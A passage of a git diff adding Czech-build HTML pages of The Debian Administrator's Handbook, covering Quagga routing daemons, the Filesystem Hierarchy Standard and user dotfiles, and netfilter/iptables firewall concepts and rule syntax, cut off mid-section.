+			Dynamic routing allows routers to adjust, in real time, the paths used for transmitting IP packets. Each protocol involves its own method of defining routes (shortest path, use routes advertised by peers, and so on).
+		</div><div
+            class="para">
+			In the Linux kernel, a route links a network device to a set of machines that can be reached through this device. The <code
+              class="command">route</code> command defines new routes and displays existing ones.
+		</div><a
+            id="id-1.13.7.6.4"
+            class="indexterm"></a></div><div
+          class="para">
+			Quagga is a set of daemons cooperating to define the routing tables to be used by the Linux kernel; each routing protocol (most notably BGP, OSPF and RIP) provides its own daemon. The <code
+            class="command">zebra</code> daemon collects information from other daemons and handles static routing tables accordingly. The other daemons are known as <code
+            class="command">bgpd</code>, <code
+            class="command">ospfd</code>, <code
+            class="command">ospf6d</code>, <code
+            class="command">ripd</code>, <code
+            class="command">ripngd</code>, <code
+            class="command">isisd</code>, and <code
+            class="command">babeld</code>.
+		</div><a
+          id="id-1.13.7.8"
+          class="indexterm"></a><a
+          id="id-1.13.7.9"
+          class="indexterm"></a><a
+          id="id-1.13.7.10"
+          class="indexterm"></a><a
+          id="id-1.13.7.11"
+          class="indexterm"></a><a
+          id="id-1.13.7.12"
+          class="indexterm"></a><a
+          id="id-1.13.7.13"
+          class="indexterm"></a><a
+          id="id-1.13.7.14"
+          class="indexterm"></a><a
+          id="id-1.13.7.15"
+          class="indexterm"></a><a
+          id="id-1.13.7.16"
+          class="indexterm"></a><a
+          id="id-1.13.7.17"
+          class="indexterm"></a><a
+          id="id-1.13.7.18"
+          class="indexterm"></a><a
+          id="id-1.13.7.19"
+          class="indexterm"></a><div
+          class="para">
+			Daemons are enabled by editing the <code
+            class="filename">/etc/quagga/daemons</code> file and creating the appropriate configuration file in <code
+            class="filename">/etc/quagga/</code>; this configuration file must be named after the daemon, with a <code
+            class="filename">.conf</code> extension, and belong to the <code
+            class="literal">quagga</code> user and the <code
+            class="literal">quaggavty</code> group, in order for the <code
+            class="filename">/etc/init.d/quagga</code> script to invoke the daemon.
+		</div><div
+          class="para">
+			The configuration of each of these daemons requires knowledge of the routing protocol in question. These protocols cannot be described in detail here, but the <span
+            class="pkg pkg">quagga-doc</span> provides ample explanation in the form of an <code
+            class="command">info</code> file. The same contents may be more easily browsed as HTML on the Quagga website: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.nongnu.org/quagga/docs/docs-info.html">http://www.nongnu.org/quagga/docs/docs-info.html</a></div>
+		</div><div
+          class="para">
+			In addition, the syntax is very close to a standard router's configuration interface, and network administrators will adapt quickly to <code
+            class="command">quagga</code>.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> OSPF, BGP or RIP?</strong></p></div></div></div><div
+            class="para">
+			OSPF is generally the best protocol to use for dynamic routing on private networks, but BGP is more common for Internet-wide routing. RIP is rather ancient, and hardly used anymore.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quality-of-service.html"><strong>Předcházející</strong>10.3. Quality of Service</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ipv6.html"><strong>Další</strong>10.5. IPv6</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.filesystem-hierarchy.html b/tmp/cs-CZ/html/sect.filesystem-hierarchy.html
new file mode 100644
index 000000000..5895fd259
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.filesystem-hierarchy.html
@@ -0,0 +1,223 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.2. Organization of the Filesystem Hierarchy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="next"
+        href="sect.computer-layers.html"
+        title="B.3. Inner Workings of a Computer: the Different Layers Involved" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.filesystem-hierarchy.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="short-remedial-course.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.computer-layers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.filesystem-hierarchy"></a>B.2. Organization of the Filesystem Hierarchy</h2></div></div></div><a
+          id="id-1.21.5.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.21.5.3"></a>B.2.1. The Root Directory</h3></div></div></div><div
+            class="para">
+				A Debian system is organized along the <span
+              class="emphasis"><em>Filesystem Hierarchy Standard</em></span> (FHS). This standard defines the purpose of each directory. For instance, the top-level directories are described as follows:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/bin/</code>: basic programs;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/boot/</code>: Linux kernel and other files required for its early boot process;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/dev/</code>: device files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/etc/</code>: configuration files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/home/</code>: user's personal files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/lib/</code>: basic libraries;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/media/*</code>: mount points for removable devices (CD-ROM, USB keys and so on);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/mnt/</code>: temporary mount point;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/opt/</code>: extra applications provided by third parties;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/root/</code>: administrator's (root's) personal files;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/run/</code>: volatile runtime data that does not persist across reboots (not yet included in the FHS);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/sbin/</code>: system programs;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/srv/</code>: data used by servers hosted on this system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/tmp/</code>: temporary files; this directory is often emptied at boot;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/usr/</code>: applications; this directory is further subdivided into <code
+                    class="filename">bin</code>, <code
+                    class="filename">sbin</code>, <code
+                    class="filename">lib</code> (according to the same logic as in the root directory). Furthermore, <code
+                    class="filename">/usr/share/</code> contains architecture-independent data. <code
+                    class="filename">/usr/local/</code> is meant to be used by the administrator for installing applications manually without overwriting files handled by the packaging system (<code
+                    class="command">dpkg</code>).
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/var/</code>: variable data handled by daemons. This includes log files, queues, spools, caches and so on.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">/proc/</code> and <code
+                    class="filename">/sys/</code> are specific to the Linux kernel (and not part of the FHS). They are used by the kernel for exporting data to user space (see <a
+                    class="xref"
+                    href="sect.computer-layers.html#sect.userspace-presentation">B.3.4 – „The User Space“</a> and <a
+                    class="xref"
+                    href="sect.user-space.html">B.5 – „The User Space“</a> for explanations about this concept).
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.21.5.4"></a>B.2.2. The User's Home Directory</h3></div></div></div><div
+            class="para">
+				The contents of a user's home directory is not standardized, but there are still a few noteworthy conventions. One is that a user's home directory is often referred to by a tilde (“~”). That is useful to know because command interpreters automatically replace a tilde with the correct directory (usually <code
+              class="filename">/home/<em
+                class="replaceable">user</em>/</code>).
+			</div><div
+            class="para">
+				Traditionally, application configuration files are often stored directly under the user's home directory, but their names usually start with a dot (for instance, the <code
+              class="command">mutt</code> email client stores its configuration in <code
+              class="filename">~/.muttrc</code>). Note that filenames that start with a dot are hidden by default; and <code
+              class="command">ls</code> only lists them when the <code
+              class="literal">-a</code> option is used, and graphical file managers need to be told to display hidden files.
+			</div><div
+            class="para">
+				Some programs also use multiple configuration files organized in one directory (for instance, <code
+              class="filename">~/.ssh/</code>). Some applications (such as the Iceweasel web browser) also use their directory to store a cache of downloaded data. This means that those directories can end up using a lot of disk space.
+			</div><div
+            class="para">
+				These configuration files stored directly in a user's home directory, often collectively referred to as <span
+              class="emphasis"><em>dotfiles</em></span>, have long proliferated to the point that these directories can be quite cluttered with them. Fortunately, an effort led collectively under the FreeDesktop.org umbrella has resulted in the “XDG Base Directory Specification”, a convention that aims at cleaning up these files and directory. This specification states that configuration files should be stored under <code
+              class="filename">~/.config</code>, cache files under <code
+              class="filename">~/.cache</code>, and application data files under <code
+              class="filename">~/.local</code> (or subdirectories thereof). This convention is slowly gaining traction, and several applications (especially graphical ones) have started following it.
+			</div><div
+            class="para">
+				Graphical desktops usually display the contents of the <code
+              class="filename">~/Desktop/</code> directory (or whatever the appropriate translation is for systems not configured in English) on the desktop (ie, what is visible on screen once all applications are closed or iconized).
+			</div><div
+            class="para">
+				Finally, the email system sometimes stores incoming emails into a <code
+              class="filename">~/Mail/</code> directory.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="short-remedial-course.html"><strong>Předcházející</strong>Příloha B. Short Remedial Course</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.computer-layers.html"><strong>Další</strong>B.3. Inner Workings of a Computer: the Different ...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.firewall-packet-filtering.html b/tmp/cs-CZ/html/sect.firewall-packet-filtering.html
new file mode 100644
index 000000000..7bf26176d
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.firewall-packet-filtering.html
@@ -0,0 +1,584 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.2. Firewall or Packet Filtering</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="next"
+        href="sect.supervision.html"
+        title="14.3. Supervision: Prevention, Detection, Deterrence" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.firewall-packet-filtering.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="security.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.supervision.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.firewall-packet-filtering"></a>14.2. Firewall or Packet Filtering</h2></div></div></div><a
+          id="id-1.17.5.2"
+          class="indexterm"></a><a
+          id="id-1.17.5.3"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Firewall</strong></p></div></div></div><a
+            id="id-1.17.5.4.2"
+            class="indexterm"></a><div
+            class="para">
+			A <span
+              class="emphasis"><em>firewall</em></span> is a piece of computer equipment with hardware and/or software that sorts the incoming or outgoing network packets (coming to or from a local network) and only lets through those matching certain predefined conditions.
+		</div></div><div
+          class="para">
+			A firewall is a filtering network gateway and is only effective on packets that must go through it. Therefore, it can only be effective when going through the firewall is the only route for these packets.
+		</div><div
+          class="para">
+			The lack of a standard configuration (and the “process, not product” motto) explains the lack of a turn-key solution. There are, however, tools that make it simpler to configure the <span
+            class="emphasis"><em>netfilter</em></span> firewall, with a graphical representation of the filtering rules. <code
+            class="command">fwbuilder</code> is undoubtedly among the best of them.
+		</div><a
+          id="id-1.17.5.7"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SPECIFIC CASE</em></span> Local Firewall</strong></p></div></div></div><div
+            class="para">
+			A firewall can be restricted to one particular machine (as opposed to a complete network), in which case its role is to filter or limit access to some services, or possibly to prevent outgoing connections by rogue software that a user could, willingly or not, have installed.
+		</div></div><div
+          class="para">
+			The Linux kernel embeds the <span
+            class="emphasis"><em>netfilter</em></span> firewall. It can be controlled from user space with the <code
+            class="command">iptables</code> and <code
+            class="command">ip6tables</code> commands. The difference between these two commands is that the former acts on the IPv4 network, whereas the latter acts on IPv6. Since both network protocol stacks will probably be around for many years, both tools will need to be used in parallel.
+		</div><a
+          id="id-1.17.5.10"
+          class="indexterm"></a><a
+          id="id-1.17.5.11"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.netfilter"></a>14.2.1. Netfilter Behavior</h3></div></div></div><div
+            class="para">
+				<span
+              class="emphasis"><em>netfilter</em></span> uses four distinct tables which store rules regulating three kinds of operations on packets:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">filter</code> concerns filtering rules (accepting, refusing or ignoring a packet);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">nat</code> concerns translation of source or destination addresses and ports of packages;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">mangle</code> concerns other changes to the IP packets (including the ToS — <span
+                    class="emphasis"><em>Type of Service</em></span> — field and options);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">raw</code> allows other manual modifications on packets before they reach the connection tracking system.
+					</div></li></ul></div><div
+            class="para">
+				Each table contains lists of rules called <span
+              class="emphasis"><em>chains</em></span>. The firewall uses standard chains to handle packets based on predefined circumstances. The administrator can create other chains, which will only be used when referred to by one of the standard chains (either directly or indirectly).
+			</div><a
+            id="id-1.17.5.12.5"
+            class="indexterm"></a><a
+            id="id-1.17.5.12.6"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="literal">filter</code> table has three standard chains:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">INPUT</code>: concerns packets whose destination is the firewall itself;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OUTPUT</code>: concerns packets emitted by the firewall;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">FORWARD</code>: concerns packets transiting through the firewall (which is neither their source nor their destination).
+					</div></li></ul></div><div
+            class="para">
+				The <code
+              class="literal">nat</code> table also has three standard chains:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PREROUTING</code>: to modify packets as soon as they arrive;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">POSTROUTING</code>: to modify packets when they are ready to go on their way;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OUTPUT</code>: to modify packets generated by the firewall itself.
+					</div></li></ul></div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.chaines-netfilter"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/netfilter.png"
+                  alt="How netfilter chains are called" /></div></div><p
+              class="title"><strong>Obrázek 14.1. How <span
+                  class="emphasis"><em>netfilter</em></span> chains are called</strong></p></div><div
+            class="para">
+				Each chain is a list of rules; each rule is a set of conditions and an action to execute when the conditions are met. When processing a packet, the firewall scans the appropriate chain, one rule after another; when the conditions for one rule are met, it “jumps” (hence the <code
+              class="literal">-j</code> option in the commands) to the specified action to continue processing. The most common behaviors are standardized, and dedicated actions exist for them. Taking one of these standard actions interrupts the processing of the chain, since the packet's fate is already sealed (barring an exception mentioned below):
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> ICMP</strong></p></div></div></div><div
+              class="para">
+				ICMP (<span
+                class="emphasis"><em>Internet Control Message </em></span>Protocol) is the protocol used to transmit complementary information on communications. It allows testing network connectivity with the <code
+                class="command">ping</code> command (which sends an ICMP <span
+                class="emphasis"><em>echo request</em></span> message, which the recipient is meant to answer with an ICMP <span
+                class="emphasis"><em>echo reply</em></span> message). It signals a firewall rejecting a packet, indicates an overflow in a receive buffer, proposes a better route for the next packets in the connection, and so on. This protocol is defined by several RFC documents; the initial RFC777 and RFC792 were soon completed and extended. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc777.html">http://www.faqs.org/rfcs/rfc777.html</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc792.html">http://www.faqs.org/rfcs/rfc792.html</a></div>
+			</div><div
+              class="para">
+				For reference, a receive buffer is a small memory zone storing data between the time it arrives from the network and the time the kernel handles it. If this zone is full, new data cannot be received, and ICMP signals the problem, so that the emitter can slow down its transfer rate (which should ideally reach an equilibrium after some time).
+			</div><a
+              id="id-1.17.5.12.13.4"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.5"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.6"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.7"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.8"
+              class="indexterm"></a><div
+              class="para">
+				Note that although an IPv4 network can work without ICMP, ICMPv6 is strictly required for an IPv6 network, since it combines several functions that were, in the IPv4 world, spread across ICMPv4, IGMP (<span
+                class="emphasis"><em>Internet Group Membership Protocol</em></span>) and ARP (<span
+                class="emphasis"><em>Address Resolution Protocol</em></span>). ICMPv6 is defined in RFC4443. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc4443.html">http://www.faqs.org/rfcs/rfc4443.html</a></div>
+			</div></div><div
+            class="para">
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ACCEPT</code>: allow the packet to go on its way;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">REJECT</code>: reject the packet with an ICMP error packet (the <code
+                    class="literal">--reject-with <em
+                      class="replaceable">type</em></code> option to <code
+                    class="command">iptables</code> allows selecting the type of error);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DROP</code>: delete (ignore) the packet;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">LOG</code>: log (via <code
+                    class="command">syslogd</code>) a message with a description of the packet; note that this action does not interrupt processing, and the execution of the chain continues at the next rule, which is why logging refused packets requires both a LOG and a REJECT/DROP rule;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ULOG</code>: log a message via <code
+                    class="command">ulogd</code>, which can be better adapted and more efficient than <code
+                    class="command">syslogd</code> for handling large numbers of messages; note that this action, like LOG, also returns processing to the next rule in the calling chain;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<em
+                    class="replaceable">chain_name</em>: jump to the given chain and evaluate its rules;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RETURN</code>: interrupt processing of the current chain, and return to the calling chain; in case the current chain is a standard one, there's no calling chain, so the default action (defined with the <code
+                    class="literal">-P</code> option to <code
+                    class="command">iptables</code>) is executed instead;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SNAT</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>Source NAT</em></span> (extra options describe the exact changes to apply);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DNAT</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>Destination NAT</em></span> (extra options describe the exact changes to apply);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MASQUERADE</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>masquerading</em></span> (a special case of <span
+                    class="emphasis"><em>Source NAT</em></span>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">REDIRECT</code> (only in the <code
+                    class="literal">nat</code> table): redirect a packet to a given port of the firewall itself; this can be used to set up a transparent web proxy that works with no configuration on the client side, since the client thinks it connects to the recipient whereas the communications actually go through the proxy.
+					</div></li></ul></div><div
+            class="para">
+				Other actions, particularly those concerning the <code
+              class="literal">mangle</code> table, are outside the scope of this text. The <span
+              class="citerefentry"><span
+                class="refentrytitle">iptables</span>(8)</span> and <span
+              class="citerefentry"><span
+                class="refentrytitle">ip6tables</span>(8)</span> have a comprehensive list.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.iptables"></a>14.2.2. Syntax of <code
+                    class="command">iptables</code> and <code
+                    class="command">ip6tables</code></h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">iptables</code> and <code
+              class="command">ip6tables</code> commands allow manipulating tables, chains and rules. Their <code
+              class="literal">-t <em
+                class="replaceable">table</em></code> option indicates which table to operate on (by default, <code
+              class="literal">filter</code>).
+			</div><a
+            id="id-1.17.5.13.3"
+            class="indexterm"></a><a
+            id="id-1.17.5.13.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.iptables-command"></a>14.2.2.1. Commands</h4></div></div></div><div
+              class="para">
+					The <code
+                class="literal">-N <em
+                  class="replaceable">chain</em></code> option creates a new chain. The <code
+                class="literal">-X <em
+                  class="replaceable">chain</em></code> deletes an empty and unused chain. The <code
+                class="literal">-A <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule</em></code> adds a rule at the end of the given chain. The <code
+                class="literal">-I <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule_num</em> <em
+                  class="replaceable">rule</em></code> option inserts a rule before the rule number <em
+                class="replaceable">rule_num</em>. The <code
+                class="literal">-D <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule_num</em></code> (or <code
+                class="literal">-D <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule</em></code>) option deletes a rule in a chain; the first syntax identifies the rule to be deleted by its number, while the latter identifies it by its contents. The <code
+                class="literal">-F <em
+                  class="replaceable">chain</em></code> option flushes a chain (deletes all its rules); if no chain is mentioned, all the rules in the table are deleted. The <code
+                class="literal">-L <em
+                  class="replaceable">chain</em></code> option lists the rules in the chain. Finally, the <code
+                class="literal">-P <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">action</em></code> option defines the default action, or “policy”, for a given chain; note that only standard chains can have such a policy.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.iptables-rules"></a>14.2.2.2. Rules</h4></div></div></div><a
+              id="id-1.17.5.13.6.2"
+              class="indexterm"></a><div
+              class="para">
+					Each rule is expressed as <code
+                class="literal"><em
+                  class="replaceable">conditions</em> -j <em
+                  class="replaceable">action</em> <em
+                  class="replaceable">action_options</em></code>. If several conditions are described in the same rule, then the criterion is the conjunction (logical <span
+                class="emphasis"><em>and</em></span>) of the conditions, which is at least as restrictive as each individual condition.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-p <em
+                  class="replaceable">protocol</em></code> condition matches the protocol field of the IP packet. The most common values are <code
+                class="literal">tcp</code>, <code
+                class="literal">udp</code>, <code
+                class="literal">icmp</code>, and <code
+                class="literal">icmpv6</code>. Prefixing the condition with an exclamation mark negates the condition, which then becomes a match for “any packets with a different protocol than the specified one”. This negation mechanism is not specific to the <code
+                class="literal">-p</code> option and it can be applied to all other conditions too.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-s <em
+                  class="replaceable">address</em></code> or <code
+                class="literal">-s <em
+                  class="replaceable">network/mask</em></code> condition matches the source address of the packet. Correspondingly, <code
+                class="literal">-d <em
+                  class="replaceable">address</em></code> or <code
+                class="literal">-d <em
+                  class="replaceable">network/mask</em></code> matches the destination address.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-i <em
+                  class="replaceable">interface</em></code> condition selects packets coming from the given network interface. <code
+                class="literal">-o <em
+                  class="replaceable">interface</em></code> selects packets going out on a specific interface.
+				</div><div
+              class="para">
+					There are more specific conditions, depending on the generic conditions described above. For instance, the <code
+                class="literal">-p tcp</code> condition can be complemented with conditions on the TCP ports, with clauses such as <code
+                class="literal">--source-port <em
+                  class="replaceable">port</em></code> and <code
+                class="literal">--destination-port <em
+                  class="replaceable">port</em></code>.
+				</div><div
+              class="para">
+					The <code
+                class="literal">--state <em
+                  class="replaceable">state</em></code> condition matches the state of a packet in a connection (this requires the <code
+                class="command">ipt_conntrack</code> kernel module, for connection tracking). The <code
+                class="literal">NEW</code> state describes a packet starting a new connection; <code
+                class="literal">ESTABLISHED</code> matches packets belonging to an already existing connection, and <code
+                class="literal">RELATED</code> matches packets initiating a new connection related to an existing one (which is useful for the <code
+                class="literal">ftp-data</code> connections in the “active” mode of the FTP protocol).
+				</div><div
+              class="para">
+					The previous section lists available actions, but not their respective options. The <code
+                class="literal">LOG</code> action, for instance, has the following options:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-level</code>, with default value <code
+                      class="literal">warning</code>, indicates the <code
+                      class="command">syslog</code> severity level;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-prefix</code> allows specifying a text prefix to differentiate between logged messages;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-tcp-sequence</code>, <code
+                      class="literal">--log-tcp-options</code> and <code
+                      class="literal">--log-ip-options</code> indicate extra data to be integrated into the message: respectively, the TCP sequence number, TCP options, and IP options.
+						</div></li></ul></div><div
